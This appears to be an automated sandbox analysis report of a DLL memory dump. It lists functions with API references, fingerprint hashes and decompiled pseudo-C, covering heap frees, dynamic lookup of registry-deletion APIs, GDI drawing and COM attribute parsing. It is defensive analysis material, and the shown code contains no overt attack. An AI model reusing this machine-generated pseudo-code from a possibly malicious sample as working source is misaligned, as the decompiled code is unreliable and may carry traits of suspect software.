Part of subcall function 6E7E1A90: ClientToScreen.USER32(?,?), ref: 6E7E1BCB

DeleteObject.GDI32(?), ref: 6E7E0800

Strings

Arial, xrefs: 6E7E077E

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Client$CreateObjectScreen$CompatibleMessageRectSelectSend$BeginBitmapCapsColorDeleteDeviceFontModePaintParentReleaseTextTimer
String ID: Arial
API String ID: 1525433823-493054409
Opcode ID: ff417b620a34d0f89749fe245c88aa89f3466903252618cc31484ff039efadc9
Instruction ID: ce4ddfe0e742bb969b84397d5854ec8d6d579265cd580516d9cb9b376251e4ee
Opcode Fuzzy Hash: ff417b620a34d0f89749fe245c88aa89f3466903252618cc31484ff039efadc9
Instruction Fuzzy Hash: DF31E231340606EFEB109FA8DD4AB9A7BA8FB55311F104026F505DA6E0CBB6E861CFD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F9844, Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E7F9844(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x6e80ede0) {
					E6E7F9268(_t52);
					_t26 = _a4;
				}
				E6E7F9268( *((intOrPtr*)(_t26 + 0x3c)));
				E6E7F9268( *((intOrPtr*)(_a4 + 0x30)));
				E6E7F9268( *((intOrPtr*)(_a4 + 0x34)));
				E6E7F9268( *((intOrPtr*)(_a4 + 0x38)));
				E6E7F9268( *((intOrPtr*)(_a4 + 0x28)));
				E6E7F9268( *((intOrPtr*)(_a4 + 0x2c)));
				E6E7F9268( *((intOrPtr*)(_a4 + 0x40)));
				E6E7F9268( *((intOrPtr*)(_a4 + 0x44)));
				E6E7F9268( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E6E7F9732(5,  &_v8);
				_v8 =  &_a4;
				return E6E7F975A(4,  &_v8);
			}

0x6e7f984a
0x6e7f984d
0x6e7f9855
0x6e7f9858
0x6e7f985d
0x6e7f9860
0x6e7f9864
0x6e7f986f
0x6e7f987a
0x6e7f9885
0x6e7f9890
0x6e7f989b
0x6e7f98a6
0x6e7f98b1
0x6e7f98bf
0x6e7f98c7
0x6e7f98d0
0x6e7f98d8
0x6e7f98ec

APIs

_free.LIBCMT ref: 6E7F9858

Part of subcall function 6E7F9268: HeapFree.KERNEL32(00000000,00000000,?,6E7F69EA,000000FF,000000FF), ref: 6E7F927E
Part of subcall function 6E7F9268: GetLastError.KERNEL32(6E7F6065,?,6E7F69EA,000000FF,000000FF), ref: 6E7F9290

_free.LIBCMT ref: 6E7F9864
_free.LIBCMT ref: 6E7F986F
_free.LIBCMT ref: 6E7F987A
_free.LIBCMT ref: 6E7F9885
_free.LIBCMT ref: 6E7F9890
_free.LIBCMT ref: 6E7F989B
_free.LIBCMT ref: 6E7F98A6
_free.LIBCMT ref: 6E7F98B1
_free.LIBCMT ref: 6E7F98BF

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 72e873eb8f9a789c837642b3454eb32d006c17b4cdb83dd9b2e19732a4a3daa5
Instruction ID: e31e0fc5783499c9f8d7ce9aeb86320e831159880ff7e477d7bc2ed25361e031
Opcode Fuzzy Hash: 72e873eb8f9a789c837642b3454eb32d006c17b4cdb83dd9b2e19732a4a3daa5
Instruction Fuzzy Hash: A611C076505108EFCB09DFD4CA44CDD3BADEF15654F814AA0BA089F631DB31EA52DB80

Uniqueness

Uniqueness Score: -1.00%

Function 6E7DD940, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 100libraryloaderregistryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,77DCEE0D,?,?,?,6E809130,000000FF), ref: 6E7DD979
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW,?,?,?,6E809130,000000FF), ref: 6E7DD989
GetModuleHandleW.KERNEL32(Advapi32.dll,77DCEE0D,?,?,?,6E809130,000000FF), ref: 6E7DD9E9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW,?,?,?,6E809130,000000FF), ref: 6E7DD9F9
RegDeleteKeyW.ADVAPI32(?,?), ref: 6E7DDA48

Strings

RegDeleteKeyTransactedW, xrefs: 6E7DD983
RegDeleteKeyExW, xrefs: 6E7DD9F3
Advapi32.dll, xrefs: 6E7DD974, 6E7DD9E4

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc$Delete
String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
API String ID: 2668475584-1053001802
Opcode ID: 38548268f65470729ee6647cacc3d45ea8c4d91e3f3aa8297e51697a8388547c
Instruction ID: 0a0c187aecff3d11aaecfd5909291dd6ae6826f54678a2ec1ef869a2ccade3ec
Opcode Fuzzy Hash: 38548268f65470729ee6647cacc3d45ea8c4d91e3f3aa8297e51697a8388547c
Instruction Fuzzy Hash: B5310632648605EFDB10CF99DE04F95BBA4E746710F00C16EE91897790D736A914CFE4

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D8730, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E6E7D8730(signed int __ebx, int* __ecx, signed int __edx, void* __edi, void* __esi, long long __fp0, short* _a4) {
				int _v8;
				char _v12;
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				int _v44;
				int _v48;
				char _v56;
				char _v60;
				int _v64;
				int _v68;
				int _v72;
				signed int _v76;
				int _v84;
				int _v88;
				char _v92;
				signed int _v96;
				char _v100;
				int _v104;
				signed int _v148;
				int _v192;
				char _v200;
				signed int _v204;
				int _v208;
				signed int _v268;
				int _v312;
				char _v320;
				signed int _v324;
				int _v328;
				signed int _v384;
				signed int _v388;
				signed int _v400;
				signed int _v404;
				unsigned int _v408;
				signed int _v412;
				signed int _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				void* __ebp;
				signed int _t335;
				signed int _t336;
				signed int _t340;
				signed int _t343;
				signed int _t344;
				signed int _t348;
				signed int _t353;
				signed int _t354;
				intOrPtr* _t362;
				signed int _t368;
				signed int _t369;
				void* _t372;
				void* _t380;
				signed int _t386;
				signed int _t388;
				signed int _t392;
				void* _t393;
				signed int _t394;
				intOrPtr _t398;
				void* _t409;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				void* _t415;
				signed int _t421;
				void* _t425;
				void* _t426;
				signed int _t427;
				signed int _t430;
				signed int _t432;
				signed int _t437;
				void* _t438;
				signed int _t440;
				signed int _t447;
				signed int _t451;
				short* _t453;
				int _t454;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t460;
				signed int _t466;
				intOrPtr* _t472;
				signed int _t478;
				signed int _t482;
				short* _t484;
				int _t485;
				signed int _t487;
				signed int _t488;
				signed int _t489;
				signed int _t491;
				int _t500;
				int _t504;
				int* _t511;
				int* _t512;
				signed int _t516;
				signed int* _t518;
				signed int _t519;
				void* _t520;
				signed int _t521;
				signed int _t522;
				signed int _t527;
				signed int _t528;
				signed int* _t532;
				signed int _t533;
				signed int _t536;
				signed int* _t537;
				signed int _t538;
				void* _t539;
				signed int _t540;
				signed int _t541;
				signed int _t542;
				signed int* _t545;
				signed int _t546;
				signed int _t548;
				signed int _t549;
				signed int _t552;
				signed int _t553;
				signed int _t559;
				signed int _t560;
				signed int _t563;
				signed int _t564;
				intOrPtr* _t574;
				int _t575;
				signed int _t576;
				signed int* _t577;
				signed int _t583;
				signed int _t591;
				signed int _t593;
				int _t594;
				signed int _t595;
				signed int _t596;
				signed int* _t597;
				signed int _t598;
				int* _t599;
				signed int _t600;
				signed int _t605;
				signed int _t608;
				unsigned int _t609;
				signed int _t610;
				int _t611;
				signed int _t613;
				void* _t614;
				signed int _t617;
				void* _t618;
				intOrPtr* _t628;
				void* _t631;
				signed int _t642;
				signed int _t649;
				intOrPtr* _t656;
				intOrPtr* _t670;
				int _t675;
				signed int _t678;
				signed int _t681;
				intOrPtr _t684;
				signed int _t693;
				void* _t694;
				signed int _t696;
				signed int _t698;
				intOrPtr* _t699;
				short* _t701;
				int _t702;
				void* _t704;
				int* _t705;
				signed int _t707;
				unsigned int _t708;
				signed int _t716;
				int _t721;
				int _t722;
				int* _t724;
				signed int _t726;
				unsigned int _t729;
				signed int _t730;
				int _t731;
				signed int _t733;
				intOrPtr _t735;
				signed int _t739;
				void* _t741;
				void* _t747;
				signed int _t748;
				void* _t749;
				signed int _t750;
				signed int _t753;
				signed int _t754;
				signed int _t755;
				signed int _t756;
				void* _t757;
				void* _t758;
				void* _t761;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				void* _t777;
				void* _t778;
				void* _t781;
				void* _t782;
				long long _t802;

				_t802 = __fp0;
				_t669 = __edx;
				_t592 = __ecx;
				_t573 = __ebx;
				_t753 = _t772;
				_push(0xffffffff);
				_push(E6E808B58);
				_push( *[fs:0x0]);
				_t773 = _t772 - 0x1c;
				_t335 =  *0x6e81e008; // 0x77dcee0d
				_t336 = _t335 ^ _t753;
				_v24 = _t336;
				_push(__esi);
				_push(__edi);
				_push(_t336);
				 *[fs:0x0] =  &_v16;
				_t721 = __ecx;
				_t701 = _a4;
				 *__ecx = 0;
				if( *_t701 != 8) {
					__imp__#8( &_v40);
					_v8 = 0;
					__eflags =  &_v40 - _t701;
					if( &_v40 != _t701) {
						L4:
						_t340 =  &_v40;
						__imp__#12(_t340, _t701, 0, 8);
						__eflags = _t340;
						if(_t340 < 0) {
							E6E7E7D20(_t340);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t753);
							_t754 = _t773;
							_push(0xffffffff);
							_push(E6E808BC0);
							_push( *[fs:0x0]);
							_t774 = _t773 - 0x4c;
							_t343 =  *0x6e81e008; // 0x77dcee0d
							_t344 = _t343 ^ _t754;
							_v96 = _t344;
							_push(_t573);
							_push(_t721);
							_push(_t701);
							_push(_t344);
							 *[fs:0x0] =  &_v92;
							_v148 = _t669;
							_v104 = 0;
							_v84 = 0;
							_t593 =  *_t592;
							__eflags = _t593;
							if(_t593 == 0) {
								E6E7E7D20(0x80004003);
								goto L80;
							} else {
								_t669 =  &_v32;
								_v12 = 0;
								_v32 = 0;
								_t516 =  *((intOrPtr*)( *_t593 + 0x44))(_t593, _t669);
								__eflags = _t516;
								if(_t516 >= 0) {
									_v28 = 0;
									_v12 = 3;
									_t721 = _v32;
									__eflags = _t721;
									if(__eflags == 0) {
										L80:
										E6E7E7D20(0x80004003);
										goto L81;
									} else {
										_t716 =  *( *_t721 + 0x1c);
										_v12 = 3;
										_v28 = 0;
										_t518 = E6E7D82F0(_t573,  &_v68, _t669, __eflags, "name");
										_v12 = 5;
										_t519 =  *_t518;
										__eflags = _t519;
										if(_t519 == 0) {
											_t520 = 0;
											__eflags = 0;
										} else {
											_t520 =  *_t519;
										}
										_t593 =  &_v28;
										_t521 =  *_t716(_t721, _t520, _t593);
										_v12 = 3;
										_t701 = _t716 | 0xffffffff;
										_t721 = _v68;
										_t573 = _t521;
										__eflags = _t721;
										if(_t721 != 0) {
											asm("lock xadd [esi+0x8], ecx");
											_t593 = _t701 - 1;
											__eflags = _t593;
											if(_t593 == 0) {
												__eflags = _t721;
												if(_t721 != 0) {
													_t563 =  *_t721;
													__eflags = _t563;
													if(_t563 != 0) {
														__imp__#6(_t563);
														 *_t721 = 0;
													}
													_t564 =  *(_t721 + 4);
													__eflags = _t564;
													if(_t564 != 0) {
														E6E7E447C(_t564);
														_t774 = _t774 + 4;
														 *(_t721 + 4) = 0;
													}
													_push(0xc);
													E6E7E441B(_t721);
													_t774 = _t774 + 8;
												}
											}
										}
										__eflags = _t573;
										if(_t573 < 0) {
											L73:
											__eflags = 0;
											goto L74;
										} else {
											_t527 = _v28;
											__eflags = _t527;
											if(_t527 == 0) {
												L81:
												_t348 = E6E7E7D20(0x80004003);
												goto L82;
											} else {
												_t593 =  *_t527;
												_t669 =  &_v48;
												_t528 =  *((intOrPtr*)(_t593 + 0x20))(_t527, _t669);
												__eflags = _t528;
												if(_t528 < 0) {
													goto L73;
												} else {
													__imp__#8( &_v96);
													_t348 =  &_v96;
													__imp__#10(_t348,  &_v48);
													__eflags = _t348;
													if(_t348 < 0) {
														L82:
														E6E7E7D20(_t348);
														goto L83;
													} else {
														_v12 = 0xa;
														_push( &_v96);
														_t532 = E6E7D8730(_t573,  &_v68, _t669, _t701, _t721, _t802);
														_v12 = 0xb;
														_t696 =  *_t532;
														__eflags = _t696;
														if(_t696 == 0) {
															_t669 = 0;
															__eflags = 0;
														} else {
															_t669 =  *_t696;
														}
														_t649 = _t669;
														_t747 = _t649 + 2;
														do {
															_t533 =  *_t649;
															_t649 = _t649 + 2;
															__eflags = _t533;
														} while (_t533 != 0);
														_push(_t649 - _t747 >> 1);
														_t593 = _v76;
														_push(_t669);
														L193();
														_t748 = _v68;
														__eflags = _t748;
														if(_t748 != 0) {
															asm("lock xadd [esi+0x8], eax");
															__eflags = _t701 == 1;
															if(_t701 == 1) {
																__eflags = _t748;
																if(_t748 != 0) {
																	_t559 =  *_t748;
																	__eflags = _t559;
																	if(_t559 != 0) {
																		__imp__#6(_t559);
																		 *_t748 = 0;
																	}
																	_t560 =  *(_t748 + 4);
																	__eflags = _t560;
																	if(_t560 != 0) {
																		E6E7E447C(_t560);
																		_t774 = _t774 + 4;
																		 *(_t748 + 4) = 0;
																	}
																	_push(0xc);
																	E6E7E441B(_t748);
																	_t774 = _t774 + 8;
																}
															}
															_v68 = 0;
														}
														_v12 = 3;
														__imp__#9( &_v96);
														_t721 = _v32;
														__eflags = _t721;
														if(_t721 == 0) {
															L83:
															E6E7E7D20(0x80004003);
															goto L84;
														} else {
															_t591 =  *( *_t721 + 0x1c);
															_v12 = 0xc;
															_t536 = _v28;
															__eflags = _t536;
															if(__eflags != 0) {
																 *((intOrPtr*)( *_t536 + 8))(_t536);
															}
															_v12 = 3;
															_v28 = 0;
															_t537 = E6E7D82F0(_t591,  &_v68, _t669, __eflags, "value");
															_v12 = 0xd;
															_t538 =  *_t537;
															__eflags = _t538;
															if(_t538 == 0) {
																_t539 = 0;
																__eflags = 0;
															} else {
																_t539 =  *_t538;
															}
															_t593 =  &_v28;
															_t540 =  *_t591(_t721, _t539, _t593);
															_v12 = 3;
															_t573 = _t540;
															_t721 = _v68;
															__eflags = _t721;
															if(_t721 != 0) {
																asm("lock xadd [esi+0x8], ecx");
																_t593 = _t701 - 1;
																__eflags = _t593;
																if(_t593 == 0) {
																	__eflags = _t721;
																	if(_t721 != 0) {
																		_t552 =  *_t721;
																		__eflags = _t552;
																		if(_t552 != 0) {
																			__imp__#6(_t552);
																			 *_t721 = 0;
																		}
																		_t553 =  *(_t721 + 4);
																		__eflags = _t553;
																		if(_t553 != 0) {
																			E6E7E447C(_t553);
																			_t774 = _t774 + 4;
																			 *(_t721 + 4) = 0;
																		}
																		_push(0xc);
																		E6E7E441B(_t721);
																		_t774 = _t774 + 8;
																	}
																}
															}
															__eflags = _t573;
															if(_t573 < 0) {
																goto L73;
															} else {
																_t541 = _v28;
																__eflags = _t541;
																if(_t541 == 0) {
																	L84:
																	E6E7E7D20(0x80004003);
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	asm("int3");
																	_push(_t754);
																	_t755 = _t774;
																	_push(0xffffffff);
																	_push(E6E808C10);
																	_push( *[fs:0x0]);
																	_t775 = _t774 - 0x4c;
																	_t353 =  *0x6e81e008; // 0x77dcee0d
																	_t354 = _t353 ^ _t755;
																	_v204 = _t354;
																	_push(_t573);
																	_push(_t721);
																	_push(_t701);
																	_push(_t354);
																	 *[fs:0x0] =  &_v200;
																	_v268 = _t669;
																	_v208 = 0;
																	_v192 = 0;
																	_t594 =  *_t593;
																	__eflags = _t594;
																	if(_t594 == 0) {
																		L125:
																		E6E7E7D20(0x80004003);
																		goto L126;
																	} else {
																		_t669 =  &_v32;
																		_v16 = 0;
																		_v32 = 0;
																		 *((intOrPtr*)( *_t594 + 0x34))(_t594,  &_v32);
																		_t478 = _v32;
																		__eflags = _t478;
																		if(_t478 == 0) {
																			L118:
																			goto L119;
																		} else {
																			_t573 = __imp__#6;
																			while(1) {
																				_v40 = 0;
																				_v16 = 2;
																				__eflags = _t478;
																				if(_t478 == 0) {
																					goto L125;
																				}
																				_t669 =  &_v40;
																				_t482 =  *((intOrPtr*)( *_t478 + 0x1c))(_t478,  &_v40);
																				__eflags = _t482;
																				if(_t482 < 0) {
																					L124:
																					 *_t573(_v40);
																					_t478 = _v32;
																					L119:
																					_v16 = 0xc;
																					__eflags = _t478;
																					if(_t478 != 0) {
																						 *((intOrPtr*)( *_t478 + 8))(_t478);
																					}
																					 *[fs:0x0] = _v24;
																					__eflags = _v28 ^ _t755;
																					return E6E7E440A(_v28 ^ _t755);
																				} else {
																					_t484 = MultiByteToWideChar(3, 0, "counter", 0xffffffff, 0, 0);
																					_t721 = _t484;
																					_t594 = _t721 - 1;
																					__imp__#4(0, _t594);
																					_t701 = _t484;
																					__eflags = _t701;
																					if(_t701 == 0) {
																						L127:
																						E6E7D81D0(0x8007000e);
																						goto L128;
																					} else {
																						_t485 = MultiByteToWideChar(3, 0, "counter", 0xffffffff, _t701, _t721);
																						__eflags = _t485 - _t721;
																						if(_t485 != _t721) {
																							L126:
																							 *_t573(_t701);
																							goto L127;
																						} else {
																							__eflags = _t701;
																							if(_t701 == 0) {
																								goto L127;
																							} else {
																								__imp__#314(_v40, _t701, 0x400, 0);
																								_t721 = _t485;
																								 *_t573(_t701);
																								__eflags = _t721 - 1;
																								if(_t721 != 1) {
																									L108:
																									_v36 = 0;
																									_v16 = 5;
																									_t487 = _v32;
																									__eflags = _t487;
																									if(_t487 == 0) {
																										goto L125;
																									} else {
																										_t594 =  *_t487;
																										_t669 =  &_v36;
																										_v16 = 5;
																										_v36 = 0;
																										_t488 =  *((intOrPtr*)(_t594 + 0x40))(_t487,  &_v36);
																										__eflags = _t488;
																										if(_t488 < 0) {
																											_v16 = 7;
																											_t489 = _v36;
																											__eflags = _t489;
																											if(_t489 != 0) {
																												 *((intOrPtr*)( *_t489 + 8))(_t489);
																											}
																											goto L124;
																										} else {
																											_t721 = _v32;
																											_t491 = _v36;
																											__eflags = _t721 - _t491;
																											if(_t721 != _t491) {
																												_v32 = _t491;
																												_v16 = 0xa;
																												__eflags = _t491;
																												if(_t491 != 0) {
																													_t594 =  *_t491;
																													 *((intOrPtr*)(_t594 + 4))(_t491);
																													_t491 = _v36;
																												}
																												_v16 = 9;
																												__eflags = _t721;
																												if(_t721 != 0) {
																													 *((intOrPtr*)( *_t721 + 8))(_t721);
																													_t491 = _v36;
																												}
																											}
																											_v16 = 0xb;
																											__eflags = _t491;
																											if(_t491 != 0) {
																												_t594 =  *_t491;
																												 *((intOrPtr*)(_t594 + 8))(_t491);
																											}
																											 *_t573(_v40);
																											_t478 = _v32;
																											__eflags = _t478;
																											if(_t478 != 0) {
																												continue;
																											} else {
																												goto L118;
																											}
																										}
																									}
																								} else {
																									_v72 = 0;
																									_v68 = 7;
																									_v88 = 0;
																									_v48 = 0;
																									_v44 = 7;
																									_v64 = 0;
																									_v16 = 4;
																									_t594 =  &_v32;
																									L8();
																									__eflags = 0;
																									if(0 != 0) {
																										E6E7DCD90(_v92,  &_v100,  &_v88);
																										_t511 =  &_v88;
																										_t721 = _v100 + 0x20;
																										__eflags = _t721 - _t511;
																										if(_t721 != _t511) {
																											__eflags = _v68 - 8;
																											_push(_v72);
																											_t514 =  >=  ? _v88 : _t511;
																											_push( >=  ? _v88 : _t511);
																											L193();
																										}
																										_t594 = _t721 + 0x18;
																										_t512 =  &_v64;
																										__eflags = _t594 - _t512;
																										if(_t594 != _t512) {
																											__eflags = _v44 - 8;
																											_push(_v48);
																											_t513 =  >=  ? _v64 : _t512;
																											_push( >=  ? _v64 : _t512);
																											L193();
																										}
																									}
																									_v16 = 2;
																									_t693 = _v44;
																									__eflags = _t693 - 8;
																									if(_t693 < 8) {
																										L103:
																										_t669 = _v68;
																										_v48 = 0;
																										_v44 = 7;
																										_v64 = 0;
																										__eflags = _t669 - 8;
																										if(_t669 < 8) {
																											L107:
																											__eflags = 0;
																											_v72 = 0;
																											_v68 = 7;
																											_v88 = 0;
																											goto L108;
																										} else {
																											_t594 = _v88;
																											_t669 = 2 + _t669 * 2;
																											_t500 = _t594;
																											__eflags = _t669 - 0x1000;
																											if(_t669 < 0x1000) {
																												L106:
																												_push(_t669);
																												E6E7E441B(_t594);
																												_t775 = _t775 + 8;
																												goto L107;
																											} else {
																												_t594 =  *(_t594 - 4);
																												_t669 = _t669 + 0x23;
																												__eflags = _t500 - _t594 + 0xfffffffc - 0x1f;
																												if(__eflags > 0) {
																													goto L128;
																												} else {
																													goto L106;
																												}
																											}
																										}
																									} else {
																										_t594 = _v64;
																										_t694 = 2 + _t693 * 2;
																										_t504 = _t594;
																										__eflags = _t694 - 0x1000;
																										if(_t694 < 0x1000) {
																											L102:
																											_push(_t694);
																											E6E7E441B(_t594);
																											_t775 = _t775 + 8;
																											goto L103;
																										} else {
																											_t594 =  *(_t594 - 4);
																											_t669 = _t694 + 0x23;
																											__eflags = _t504 - _t594 + 0xfffffffc - 0x1f;
																											if(__eflags > 0) {
																												L128:
																												E6E7EE5E6(_t573, _t594, _t669, _t701, __eflags);
																												asm("int3");
																												asm("int3");
																												_push(_t721);
																												_t722 = _t594;
																												_t595 =  *(_t722 + 0x2c);
																												__eflags = _t595 - 8;
																												if(_t595 < 8) {
																													L134:
																													 *(_t722 + 0x28) = 0;
																													 *(_t722 + 0x2c) = 7;
																													 *((short*)(_t722 + 0x18)) = 0;
																													_t596 =  *(_t722 + 0x14);
																													__eflags = _t596 - 8;
																													if(_t596 < 8) {
																														L139:
																														 *(_t722 + 0x10) = 0;
																														__eflags = 0;
																														 *(_t722 + 0x14) = 7;
																														 *_t722 = 0;
																														return 0;
																													} else {
																														_t362 =  *_t722;
																														_t597 = 2 + _t596 * 2;
																														__eflags = _t597 - 0x1000;
																														if(_t597 < 0x1000) {
																															L138:
																															_push(_t597);
																															E6E7E441B(_t362);
																															goto L139;
																														} else {
																															_t670 =  *((intOrPtr*)(_t362 - 4));
																															_t597 =  &(_t597[8]);
																															__eflags = _t362 - _t670 + 0xfffffffc - 0x1f;
																															if(__eflags > 0) {
																																goto L140;
																															} else {
																																_t362 = _t670;
																																goto L138;
																															}
																														}
																													}
																												} else {
																													_t472 =  *((intOrPtr*)(_t722 + 0x18));
																													_t631 = 2 + _t595 * 2;
																													__eflags = _t631 - 0x1000;
																													if(_t631 < 0x1000) {
																														L133:
																														_push(_t631);
																														E6E7E441B(_t472);
																														_t775 = _t775 + 8;
																														goto L134;
																													} else {
																														_t670 =  *((intOrPtr*)(_t472 - 4));
																														_t597 = _t631 + 0x23;
																														__eflags = _t472 - _t670 + 0xfffffffc - 0x1f;
																														if(__eflags > 0) {
																															L140:
																															E6E7EE5E6(_t573, _t597, _t670, _t701, __eflags);
																															asm("int3");
																															asm("int3");
																															asm("int3");
																															asm("int3");
																															_push(_t755);
																															_t756 = _t775;
																															_push(0xffffffff);
																															_push(E6E808C60);
																															_push( *[fs:0x0]);
																															_t777 = _t775 - 0x24;
																															_t368 =  *0x6e81e008; // 0x77dcee0d
																															_t369 = _t368 ^ _t756;
																															_v324 = _t369;
																															_push(_t573);
																															_push(_t722);
																															_push(_t701);
																															_push(_t369);
																															 *[fs:0x0] =  &_v320;
																															_t574 = _t670;
																															_v328 = 0;
																															_v312 = 0;
																															_t598 =  *_t597;
																															__eflags = _t598;
																															if(_t598 == 0) {
																																L172:
																																E6E7E7D20(0x80004003);
																																goto L173;
																															} else {
																																_v20 = 0;
																																_v36 = 0;
																																 *((intOrPtr*)( *_t598 + 0x34))(_t598,  &_v36);
																																_t447 = _v36;
																																__eflags = _t447;
																																if(_t447 == 0) {
																																	L165:
																																	goto L166;
																																} else {
																																	_t701 = __imp__#6;
																																	while(1) {
																																		_v44 = 0;
																																		_v20 = 2;
																																		__eflags = _t447;
																																		if(_t447 == 0) {
																																			goto L172;
																																		}
																																		_t451 =  *((intOrPtr*)( *_t447 + 0x1c))(_t447,  &_v44);
																																		__eflags = _t451;
																																		if(_t451 < 0) {
																																			L171:
																																			 *_t701(_v44);
																																			_t447 = _v36;
																																			L166:
																																			_v20 = 0xc;
																																			__eflags = _t447;
																																			if(_t447 != 0) {
																																				 *((intOrPtr*)( *_t447 + 8))(_t447);
																																			}
																																			 *[fs:0x0] = _v28;
																																			__eflags = _v32 ^ _t756;
																																			return E6E7E440A(_v32 ^ _t756);
																																		} else {
																																			_t453 = MultiByteToWideChar(3, 0, "page", 0xffffffff, 0, 0);
																																			_t722 = _t453;
																																			_t598 = _t722 - 1;
																																			__imp__#4(0, _t598);
																																			_t701 = _t453;
																																			__eflags = _t701;
																																			if(_t701 == 0) {
																																				L174:
																																				_t372 = E6E7D81D0(0x8007000e);
																																				asm("int3");
																																				asm("int3");
																																				asm("int3");
																																				asm("int3");
																																				asm("int3");
																																				asm("int3");
																																				asm("int3");
																																				asm("int3");
																																				_t599 = _t598 + 4;
																																				_push(_t722);
																																				_t724 = _t599;
																																				_t600 =  *_t724;
																																				__eflags = _t600;
																																				if(_t600 == 0) {
																																					L181:
																																					return _t372;
																																				} else {
																																					_push(_t701);
																																					E6E7DC8B0(_t574, _t600, _t724[1], _t802, _t600);
																																					_t702 =  *_t724;
																																					_t778 = _t777 + 4;
																																					_t605 = (((0x92492493 * (_t724[2] - _t702) >> 0x20) + _t724[2] - _t702 >> 5 >> 0x1f) + ((0x92492493 * (_t724[2] - _t702) >> 0x20) + _t724[2] - _t702 >> 5)) * 8 - ((0x92492493 * (_t724[2] - _t702) >> 0x20) + _t724[2] - _t702 >> 5 >> 0x1f) + ((0x92492493 * (_t724[2] - _t702) >> 0x20) + _t724[2] - _t702 >> 5) << 3;
																																					__eflags = _t605 - 0x1000;
																																					if(_t605 < 0x1000) {
																																						L180:
																																						_push(_t605);
																																						_t372 = E6E7E441B(_t702);
																																						 *_t724 = 0;
																																						_t724[1] = 0;
																																						_t724[2] = 0;
																																						goto L181;
																																					} else {
																																						_t675 =  *(_t702 - 4);
																																						_t605 = _t605 + 0x23;
																																						_t704 = _t702 - _t675;
																																						__eflags = _t704 - 4 - 0x1f;
																																						if(__eflags > 0) {
																																							_t380 = E6E7EE5E6(_t574, _t605, _t675, _t704, __eflags);
																																							asm("int3");
																																							asm("int3");
																																							asm("int3");
																																							asm("int3");
																																							_push(_t724);
																																							_push(_t704);
																																							_t705 = _t605;
																																							_t726 =  *_t705;
																																							__eflags = _t726;
																																							if(_t726 == 0) {
																																								L191:
																																								return _t380;
																																							} else {
																																								_push(_t574);
																																								_t575 = _t705[1];
																																								__eflags = _t726 - _t575;
																																								if(_t726 != _t575) {
																																									do {
																																										E6E7DA540(_t575, _t726, _t705, _t802);
																																										_t726 = _t726 + 0x58;
																																										__eflags = _t726 - _t575;
																																									} while (_t726 != _t575);
																																									_t726 =  *_t705;
																																								}
																																								_pop(_t576);
																																								_t677 = 0x2e8ba2e9 * (_t705[2] - _t726) >> 0x20 >> 4;
																																								_t386 = ((0x2e8ba2e9 * (_t705[2] - _t726) >> 0x20 >> 4 >> 0x1f) + (0x2e8ba2e9 * (_t705[2] - _t726) >> 0x20 >> 4)) * 0x58;
																																								__eflags = _t386 - 0x1000;
																																								if(_t386 < 0x1000) {
																																									L190:
																																									_push(_t386);
																																									_t380 = E6E7E441B(_t726);
																																									 *_t705 = 0;
																																									_t705[1] = 0;
																																									_t705[2] = 0;
																																									goto L191;
																																								} else {
																																									_t608 =  *(_t726 - 4);
																																									_t386 = _t386 + 0x23;
																																									_t729 = _t726 - _t608 + 0xfffffffc;
																																									__eflags = _t729 - 0x1f;
																																									if(__eflags > 0) {
																																										E6E7EE5E6(_t576, _t608, _t677, _t705, __eflags);
																																										asm("int3");
																																										asm("int3");
																																										asm("int3");
																																										asm("int3");
																																										asm("int3");
																																										_push(_t756);
																																										_t757 = _t778;
																																										_t781 = _t778 - 0xc;
																																										_t388 = _v384;
